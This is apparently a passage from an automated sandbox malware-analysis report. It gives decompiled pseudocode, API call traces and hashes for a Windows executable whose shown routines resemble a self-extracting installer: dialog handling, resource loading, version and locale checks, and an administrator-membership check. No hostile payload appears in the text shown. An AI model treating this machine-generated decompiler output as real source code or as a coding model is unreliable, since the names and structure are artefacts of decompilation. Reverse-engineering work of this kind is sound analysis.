                                                                        • SetDlgItemTextA.USER32(?,00000834), ref: 003D316A
                                                                        • SetWindowTextA.USER32(?,lenta), ref: 003D3176
                                                                        • SetForegroundWindow.USER32(?), ref: 003D317D
                                                                        • GetDlgItem.USER32(?,00000834), ref: 003D3185
                                                                        • GetWindowLongA.USER32(00000000,000000FC), ref: 003D3190
                                                                        • SetWindowLongA.USER32(00000000,000000FC,003D30C0), ref: 003D31A3
                                                                        • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 003D31CA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                        • String ID: lenta
                                                                        • API String ID: 3785188418-2780258678
                                                                        • Opcode ID: 72f90f1262209429effed696e305278e237a3a5d273de5a3c11e62ef86189445
                                                                        • Instruction ID: 602741374be8dd2d502d6d4967a5e4bcc332bcf3b249de99c48a51c64e007e55
                                                                        • Opcode Fuzzy Hash: 72f90f1262209429effed696e305278e237a3a5d273de5a3c11e62ef86189445
                                                                        • Instruction Fuzzy Hash: AE11B132646612BBDB136F24BD0CBAA3B6CFB4A720F110613F815922E0DB709A41D747
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 82%
                                                                        			E003D468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
                                                                        				long _t4;
                                                                        				void* _t11;
                                                                        				CHAR* _t14;
                                                                        				void* _t15;
                                                                        				long _t16;
                                                                        
                                                                        				_t14 = __ecx;
                                                                        				_t11 = __edx;
                                                                        				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
                                                                        				_t16 = _t4;
                                                                        				if(_t16 <= _a4 && _t11 != 0) {
                                                                        					if(_t16 == 0) {
                                                                        						L5:
                                                                        						return 0;
                                                                        					}
                                                                        					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
                                                                        					if(_t15 == 0) {
                                                                        						goto L5;
                                                                        					}
                                                                        					__imp__memcpy_s(_t11, _a4, _t15, _t16);
                                                                        					FreeResource(_t15);
                                                                        					return _t16;
                                                                        				}
                                                                        				return _t4;
                                                                        			}









                                                                        APIs
                                                                        • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003D46A0
                                                                        • SizeofResource.KERNEL32(00000000,00000000,?,003D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003D46A9
                                                                        • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003D46C3
                                                                        • LoadResource.KERNEL32(00000000,00000000,?,003D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003D46CC
                                                                        • LockResource.KERNEL32(00000000,?,003D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003D46D3
                                                                        • memcpy_s.MSVCRT ref: 003D46E5
                                                                        • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003D46EF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                        • String ID: TITLE$lenta
                                                                        • API String ID: 3370778649-2035842925
                                                                        • Opcode ID: 8ed8b123df45e6570c7de8c01fb469e3253d0aecb27ebe4da203e1cf4d59f55d
                                                                        • Instruction ID: fda3b40d92f154f0f8667337101296eea2a1b30a4ffe8d92b641a2f0907da3e2
                                                                        • Opcode Fuzzy Hash: 8ed8b123df45e6570c7de8c01fb469e3253d0aecb27ebe4da203e1cf4d59f55d
                                                                        • Instruction Fuzzy Hash: C501D1332417007BE3221BA57D0DF2B3F2CDBCAB62F054016FB4A86280C9B1C84082A2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 94%
                                                                        			E003D681F(void* __ebx) {
                                                                        				signed int _v8;
                                                                        				char _v20;
                                                                        				struct _OSVERSIONINFOA _v168;
                                                                        				void* _v172;
                                                                        				int* _v176;
                                                                        				int _v180;
                                                                        				int _v184;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t19;
                                                                        				long _t31;
                                                                        				signed int _t35;
                                                                        				void* _t36;
                                                                        				intOrPtr _t41;
                                                                        				signed int _t44;
                                                                        
                                                                        				_t36 = __ebx;
                                                                        				_t19 =  *0x3d8004; // 0xf4fc83b5
                                                                        				_v8 = _t19 ^ _t44;
                                                                        				_t41 =  *0x3d81d8; // 0xfffffffe
                                                                        				_t43 = 0;
                                                                        				_v180 = 0xc;
                                                                        				_v176 = 0;
                                                                        				if(_t41 == 0xfffffffe) {
                                                                        					 *0x3d81d8 = 0;
                                                                        					_v168.dwOSVersionInfoSize = 0x94;
                                                                        					if(GetVersionExA( &_v168) == 0) {
                                                                        						L12:
                                                                        						_t41 =  *0x3d81d8; // 0xfffffffe
                                                                        					} else {
                                                                        						_t41 = 1;
                                                                        						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
                                                                        							goto L12;
                                                                        						} else {
                                                                        							_t31 = RegQueryValueExA(_v172, 0x3d1140, 0,  &_v184,  &_v20,  &_v180);
                                                                        							_t43 = _t31;
                                                                        							RegCloseKey(_v172);
                                                                        							if(_t31 != 0) {
                                                                        								goto L12;
                                                                        							} else {
                                                                        								_t40 =  &_v176;
                                                                        								if(E003D66F9( &_v20,  &_v176) == 0) {
                                                                        									goto L12;
                                                                        								} else {
                                                                        									_t35 = _v176 & 0x000003ff;
                                                                        									if(_t35 == 1 || _t35 == 0xd) {
                                                                        										 *0x3d81d8 = _t41;
                                                                        									} else {
                                                                        										goto L12;
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				_t18 =  &_v8; // 0x3d463b
                                                                        				return E003D6CE0(_t41, _t36,  *_t18 ^ _t44, _t40, _t41, _t43);
                                                                        			}

                                                                        APIs
                                                                        • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 003D686E
                                                                        • GetSystemMetrics.USER32(0000004A), ref: 003D68A7
                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 003D68CC
                                                                        • RegQueryValueExA.ADVAPI32(?,003D1140,00000000,?,?,0000000C), ref: 003D68F4
                                                                        • RegCloseKey.ADVAPI32(?), ref: 003D6902
                                                                          • Part of subcall function 003D66F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,003D691A), ref: 003D6741
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                        • String ID: ;F=$Control Panel\Desktop\ResourceLocale
                                                                        • API String ID: 3346862599-732160682
                                                                        • Opcode ID: 06bbe1e9543a200f140d281451b13e1c201f19a105ab37da6c6e74971f229c56
                                                                        • Instruction ID: dcdfb2736b77f19165dc6234a1fe5538e713b998c4bae44e9d68f681b56fe53e
                                                                        • Opcode Fuzzy Hash: 06bbe1e9543a200f140d281451b13e1c201f19a105ab37da6c6e74971f229c56
                                                                        • Instruction Fuzzy Hash: 11318432E012189FDB33DB51EC16BAA777CEB85718F0501A7E959A6240DB309D89CF52
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 57%
                                                                        			E003D17EE(intOrPtr* __ecx) {
                                                                        				signed int _v8;
                                                                        				short _v12;
                                                                        				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                        				_Unknown_base(*)()* _v20;
                                                                        				void* _v24;
                                                                        				intOrPtr* _v28;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t14;
                                                                        				_Unknown_base(*)()* _t20;
                                                                        				long _t28;
                                                                        				void* _t35;
                                                                        				struct HINSTANCE__* _t36;
                                                                        				signed int _t38;
                                                                        				intOrPtr* _t39;
                                                                        
                                                                        				_t14 =  *0x3d8004; // 0xf4fc83b5
                                                                        				_v8 = _t14 ^ _t38;
                                                                        				_v12 = 0x500;
                                                                        				_t37 = __ecx;
                                                                        				_v16.Value = 0;
                                                                        				_v28 = __ecx;
                                                                        				_t28 = 0;
                                                                        				_t36 = LoadLibraryA("advapi32.dll");
                                                                        				if(_t36 != 0) {
                                                                        					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                                                                        					_v20 = _t20;
                                                                        					if(_t20 != 0) {
                                                                        						 *_t37 = 0;
                                                                        						_t28 = 1;
                                                                        						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                                                                        							_t37 = _t39;
                                                                        							 *0x3da288(0, _v24, _v28);
                                                                        							_v20();
                                                                        							if(_t39 != _t39) {
                                                                        								asm("int 0x29");
                                                                        							}
                                                                        							FreeSid(_v24);
                                                                        						}
                                                                        					}
                                                                        					FreeLibrary(_t36);
                                                                        				}
                                                                        				return E003D6CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                                                                        			}

                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,003D18DD), ref: 003D181A
                                                                        • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 003D182C
                                                                        • AllocateAndInitializeSid.ADVAPI32(003D18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,003D18DD), ref: 003D1855
                                                                        • FreeSid.ADVAPI32(?,?,?,?,003D18DD), ref: 003D1883
                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,003D18DD), ref: 003D188A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                        • String ID: CheckTokenMembership$advapi32.dll
                                                                        • API String ID: 4204503880-1888249752
                                                                        • Opcode ID: d9d8053cec7495492b3f954213b751863ad649e8971f65d91951b176ff16dcf0
                                                                        • Instruction ID: 5c5f1560be59a3623b4e559943058e98f10dd8f5339997bbba493f7a98f33a42
                                                                        • Opcode Fuzzy Hash: d9d8053cec7495492b3f954213b751863ad649e8971f65d91951b176ff16dcf0
                                                                        • Instruction Fuzzy Hash: 25118172E01209BBDB129FA4FD49ABEBB78EF44701F10016BF901E3390DA709D048B91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E003D3450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                        				void* _t7;
                                                                        				void* _t11;
                                                                        				struct HWND__* _t12;
                                                                        				int _t22;
                                                                        				struct HWND__* _t24;
                                                                        
                                                                        				_t7 = _a8 - 0x10;
                                                                        				if(_t7 == 0) {
                                                                        					EndDialog(_a4, 2);
                                                                        					L11:
                                                                        					return 1;
                                                                        				}
                                                                        				_t11 = _t7 - 0x100;
                                                                        				if(_t11 == 0) {
                                                                        					_t12 = GetDesktopWindow();
                                                                        					_t24 = _a4;
                                                                        					E003D43D0(_t24, _t12);
                                                                        					SetWindowTextA(_t24, "lenta");
                                                                        					SetDlgItemTextA(_t24, 0x838,  *0x3d9404);
                                                                        					SetForegroundWindow(_t24);
                                                                        					goto L11;
                                                                        				}
                                                                        				if(_t11 == 1) {
                                                                        					_t22 = _a12;
                                                                        					if(_t22 < 6) {
                                                                        						goto L11;
                                                                        					}
                                                                        					if(_t22 <= 7) {
                                                                        						L8:
                                                                        						EndDialog(_a4, _t22);
                                                                        						return 1;
                                                                        					}
                                                                        					if(_t22 != 0x839) {
                                                                        						goto L11;
                                                                        					}
                                                                        					 *0x3d91dc = 1;
                                                                        					goto L8;
                                                                        				}
                                                                        				return 0;
                                                                        			}

                                                                        APIs
                                                                        • EndDialog.USER32(?,?), ref: 003D3490
                                                                        • GetDesktopWindow.USER32 ref: 003D349A
                                                                        • SetWindowTextA.USER32(?,lenta), ref: 003D34B2
                                                                        • SetDlgItemTextA.USER32(?,00000838), ref: 003D34C4
                                                                        • SetForegroundWindow.USER32(?), ref: 003D34CB
                                                                        • EndDialog.USER32(?,00000002), ref: 003D34D8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Window$DialogText$DesktopForegroundItem
                                                                        • String ID: lenta
                                                                        • API String ID: 852535152-2780258678
                                                                        • Opcode ID: 3c1054a44f5724e468e160a5916be8690b0da071b6cb3ee6a2fe70a50b6600f7
                                                                        • Instruction ID: 9062f34d9b0286da2d915e401f777df46fa550caaf92e3077b2ae7df6201d693
                                                                        • Opcode Fuzzy Hash: 3c1054a44f5724e468e160a5916be8690b0da071b6cb3ee6a2fe70a50b6600f7
                                                                        • Instruction Fuzzy Hash: 6F01D433242525ABC7175F6AFD0C9AE3B78EB05700F024013F94696BA0CB388F51CB82
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 95%
                                                                        			E003D2AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t16;
                                                                        				int _t21;
                                                                        				char _t32;
                                                                        				intOrPtr _t34;
                                                                        				char* _t38;
                                                                        				char _t42;
                                                                        				char* _t44;
                                                                        				CHAR* _t52;
                                                                        				intOrPtr* _t55;
                                                                        				CHAR* _t59;
                                                                        				void* _t62;
                                                                        				CHAR* _t64;
                                                                        				CHAR* _t65;
                                                                        				signed int _t66;
                                                                        
                                                                        				_t60 = __edx;
                                                                        				_t16 =  *0x3d8004; // 0xf4fc83b5
                                                                        				_t17 = _t16 ^ _t66;
                                                                        				_v8 = _t16 ^ _t66;
                                                                        				_t65 = _a4;
                                                                        				_t44 = __edx;
                                                                        				_t64 = __ecx;
                                                                        				if( *((char*)(__ecx)) != 0) {
                                                                        					GetModuleFileNameA( *0x3d9a3c,  &_v268, 0x104);
                                                                        					while(1) {
                                                                        						_t17 =  *_t64;
                                                                        						if(_t17 == 0) {
                                                                        							break;
                                                                        						}
                                                                        						_t21 = IsDBCSLeadByte(_t17);
                                                                        						 *_t65 =  *_t64;
                                                                        						if(_t21 != 0) {
                                                                        							_t65[1] = _t64[1];
                                                                        						}
                                                                        						if( *_t64 != 0x23) {
                                                                        							L19:
                                                                        							_t65 = CharNextA(_t65);
                                                                        						} else {
                                                                        							_t64 = CharNextA(_t64);
                                                                        							if(CharUpperA( *_t64) != 0x44) {
                                                                        								if(CharUpperA( *_t64) != 0x45) {
                                                                        									if( *_t64 == 0x23) {
                                                                        										goto L19;
                                                                        									}
                                                                        								} else {
                                                                        									E003D1680(_t65, E003D17C8(_t44, _t65),  &_v268);
                                                                        									_t52 = _t65;
                                                                        									_t14 =  &(_t52[1]); // 0x2
                                                                        									_t60 = _t14;
                                                                        									do {
                                                                        										_t32 =  *_t52;
                                                                        										_t52 =  &(_t52[1]);
                                                                        									} while (_t32 != 0);
                                                                        									goto L17;
                                                                        								}
                                                                        							} else {
                                                                        								E003D65E8( &_v268);
                                                                        								_t55 =  &_v268;
                                                                        								_t62 = _t55 + 1;
                                                                        								do {
                                                                        									_t34 =  *_t55;
                                                                        									_t55 = _t55 + 1;
                                                                        								} while (_t34 != 0);
                                                                        								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
                                                                        								if(_t38 != 0 &&  *_t38 == 0x5c) {
                                                                        									 *_t38 = 0;
                                                                        								}
                                                                        								E003D1680(_t65, E003D17C8(_t44, _t65),  &_v268);
                                                                        								_t59 = _t65;
                                                                        								_t12 =  &(_t59[1]); // 0x2
                                                                        								_t60 = _t12;
                                                                        								do {
                                                                        									_t42 =  *_t59;
                                                                        									_t59 =  &(_t59[1]);
                                                                        								} while (_t42 != 0);
                                                                        								L17:
                                                                        								_t65 =  &(_t65[_t52 - _t60]);
                                                                        							}
                                                                        						}
                                                                        						_t64 = CharNextA(_t64);
                                                                        					}
                                                                        					 *_t65 = _t17;
                                                                        				}
                                                                        				return E003D6CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
                                                                        			}























                                                                        APIs
                                                                        • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 003D2AE6
                                                                        • IsDBCSLeadByte.KERNEL32(00000000), ref: 003D2AF2
                                                                        • CharNextA.USER32(?), ref: 003D2B12
                                                                        • CharUpperA.USER32 ref: 003D2B1E
                                                                        • CharPrevA.USER32(?,?), ref: 003D2B55
                                                                        • CharNextA.USER32(?), ref: 003D2BD4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                        • String ID:
                                                                        • API String ID: 571164536-0
                                                                        • Opcode ID: a36337f5254eae1c92dfaac5f6a39872bc11aa7d209859a0626e9b9709781cc4
                                                                        • Instruction ID: 56ee8582734a51427434878229395876f30f1d4b9a2c25925d0940ec4bd56e22
                                                                        • Opcode Fuzzy Hash: a36337f5254eae1c92dfaac5f6a39872bc11aa7d209859a0626e9b9709781cc4
                                                                        • Instruction Fuzzy Hash: AC41E3366086455FDB179F34BC54AFE7BAD9F66300F15009BE8C287302DBB58E868B61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E003D28E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
                                                                        				void* _v8;
                                                                        				char* _v12;
                                                                        				intOrPtr _v16;
                                                                        				void* _v20;
                                                                        				intOrPtr _v24;
                                                                        				int _v28;
                                                                        				char _v32;
                                                                        				void* _v36;
                                                                        				int _v40;
                                                                        				void* _v44;
                                                                        				intOrPtr _v48;
                                                                        				intOrPtr _v52;
                                                                        				intOrPtr _v56;
                                                                        				intOrPtr _v60;
                                                                        				intOrPtr _v64;
                                                                        				long _t68;
                                                                        				void* _t70;
                                                                        				void* _t73;
                                                                        				void* _t79;
                                                                        				void* _t83;
                                                                        				void* _t87;
                                                                        				void* _t88;
                                                                        				intOrPtr _t93;
                                                                        				intOrPtr _t97;
                                                                        				intOrPtr _t99;
                                                                        				int _t101;
                                                                        				void* _t103;
                                                                        				void* _t106;
                                                                        				void* _t109;
                                                                        				void* _t110;
                                                                        
                                                                        				_v12 = __edx;
                                                                        				_t99 = __ecx;
                                                                        				_t106 = 0;
                                                                        				_v16 = __ecx;
                                                                        				_t87 = 0;
                                                                        				_t103 = 0;
                                                                        				_v20 = 0;
                                                                        				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                                                                        					L19:
                                                                        					_t106 = 1;
                                                                        				} else {
                                                                        					_t62 = 0;
                                                                        					_v8 = 0;
                                                                        					while(1) {
                                                                        						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                                                                        						if(E003D2773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                                                                        							goto L20;
                                                                        						}
                                                                        						_t11 =  &_v32; // 0x3d3938
                                                                        						_t68 = GetFileVersionInfoSizeA(_v12, _t11);
                                                                        						_v28 = _t68;
                                                                        						if(_t68 == 0) {
                                                                        							_t99 = _v16;
                                                                        							_t70 = _v8 + _t99;
                                                                        							_t93 = _v24;
                                                                        							_t87 = _v20;
                                                                        							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                                                                        								goto L18;
                                                                        							}
                                                                        						} else {
                                                                        							_t103 = GlobalAlloc(0x42, _t68);
                                                                        							if(_t103 != 0) {
                                                                        								_t73 = GlobalLock(_t103);
                                                                        								_v36 = _t73;
                                                                        								if(_t73 != 0) {
                                                                        									_t16 =  &_v32; // 0x3d3938
                                                                        									if(GetFileVersionInfoA(_v12,  *_t16, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                                                                        										L15:
                                                                        										GlobalUnlock(_t103);
                                                                        										_t99 = _v16;
                                                                        										L18:
                                                                        										_t87 = _t87 + 1;
                                                                        										_t62 = _v8 + 0x3c;
                                                                        										_v20 = _t87;
                                                                        										_v8 = _v8 + 0x3c;
                                                                        										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                                                                        											continue;
                                                                        										} else {
                                                                        											goto L19;
                                                                        										}
                                                                        									} else {
                                                                        										_t79 = _v44;
                                                                        										_t88 = _t106;
                                                                        										_v28 =  *((intOrPtr*)(_t79 + 0xc));
                                                                        										_t101 = _v28;
                                                                        										_v48 =  *((intOrPtr*)(_t79 + 8));
                                                                        										_t83 = _v8 + _v16 + _v24 + 0x94;
                                                                        										_t97 = _v48;
                                                                        										_v36 = _t83;
                                                                        										_t109 = _t83;
                                                                        										do {
                                                                        											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E003D2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
                                                                        											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E003D2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
                                                                        											_t109 = _t109 + 0x18;
                                                                        											_t88 = _t88 + 4;
                                                                        										} while (_t88 < 8);
                                                                        										_t87 = _v20;
                                                                        										_t106 = 0;
                                                                        										if(_v56 < 0 || _v64 > 0) {
                                                                        											if(_v52 < _t106 || _v60 > _t106) {
                                                                        												GlobalUnlock(_t103);
                                                                        											} else {
                                                                        												goto L15;
                                                                        											}
                                                                        										} else {
                                                                        											goto L15;
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						goto L20;
                                                                        					}
                                                                        				}
                                                                        				L20:
                                                                        				 *_a8 = _t87;
                                                                        				if(_t103 != 0) {
                                                                        					GlobalFree(_t103);
                                                                        				}
                                                                        				return _t106;
                                                                        			}

































                                                                        0x003d2a7d

                                                                        APIs
                                                                        • GlobalFree.KERNEL32 ref: 003D2A6F
                                                                          • Part of subcall function 003D2773: CharUpperA.USER32(F4FC83B5,00000000,00000000,00000000), ref: 003D27A8
                                                                          • Part of subcall function 003D2773: CharNextA.USER32(0000054D), ref: 003D27B5
                                                                          • Part of subcall function 003D2773: CharNextA.USER32(00000000), ref: 003D27BC
                                                                          • Part of subcall function 003D2773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 003D2829
                                                                          • Part of subcall function 003D2773: RegQueryValueExA.ADVAPI32(?,003D1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 003D2852
                                                                          • Part of subcall function 003D2773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 003D2870
                                                                          • Part of subcall function 003D2773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 003D28A0
                                                                        • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,003D3938,?,?,?,?,-00000005), ref: 003D2958
                                                                        • GlobalLock.KERNEL32 ref: 003D2969
                                                                        • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,003D3938,?,?,?,?,-00000005,?), ref: 003D2A21
                                                                        • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,003D3938,?,?), ref: 003D2A81
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                                        • String ID: 89=
                                                                        • API String ID: 3949799724-2211818641
                                                                        • Opcode ID: 2bd917c5cb6e65ad4936ca8937769e0fe6f8f95ef59099fd0250f40a833bd1f6
                                                                        • Instruction ID: 8c7adba39ac30f2968dc1a3f8178a4d442ae8b5c04e5cd314d840b8f97c5acd9
                                                                        • Opcode Fuzzy Hash: 2bd917c5cb6e65ad4936ca8937769e0fe6f8f95ef59099fd0250f40a833bd1f6
                                                                        • Instruction Fuzzy Hash: F2512B32D00619DBCB22DF98E884AAEFBB9FF58701F15402BE905E7311DB319A41DB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 86%
                                                                        			E003D43D0(struct HWND__* __ecx, struct HWND__* __edx) {
                                                                        				signed int _v8;
                                                                        				struct tagRECT _v24;
                                                                        				struct tagRECT _v40;
                                                                        				struct HWND__* _v44;
                                                                        				intOrPtr _v48;
                                                                        				int _v52;
                                                                        				intOrPtr _v56;
                                                                        				int _v60;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t29;
                                                                        				void* _t53;
                                                                        				intOrPtr _t56;
                                                                        				int _t59;
                                                                        				struct HWND__* _t63;
                                                                        				struct HWND__* _t67;
                                                                        				struct HWND__* _t68;
